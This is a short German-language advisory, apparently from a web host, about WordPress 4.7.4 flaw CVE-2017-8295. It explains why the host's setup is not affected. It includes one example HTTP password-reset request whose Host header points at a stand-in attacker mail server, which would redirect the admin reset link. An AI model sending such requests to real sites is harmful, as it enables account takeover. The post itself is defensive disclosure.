WordPress CVE-2017-8295 - Unauthorized Password Reset

Standard WordPress-Installationen der Version 4.7.4 sind im Moment für die Lücke CVE-2017-8295 anfällig. Mithilfe dieser Lücke kann ein Angreifer Password-Reset-Mails an beliebige Mailserver umleiten und so an den kritischen Link gelangen. Seitens WordPress gibt es hierfür noch keinen Fix.

Das funktioniert, da WordPress den Host-Header 1:1 für diverse Mail-Header in der ausgehenden Mail benutzt. Wie das genau funktioniert könnt ihr in der Exploit-DB nachlesen.
Ein Angriff würde also beispielsweise so aussehen:

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1  
Host: injected-attackers-mxserver.com   <== oh noes! D:  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password  

In unserem Setup werden Requests anhand ihrer Host-Header an die jeweiligen Uberspaces und damit an die WordPress-Instanzen verteilt. Wenn nun eine Angreiferin den Header modifiziert, landet der Request gar nicht erst bei der angegriffenen WordPress-Instanz, sondern auf unserer "Diese Domain kennen wir leider nicht"-Seite. Ein WordPress, das bei uns gehostet ist, ist für diese Lücke also nicht anfällig.

Kurz um: alles gut. weitermachen.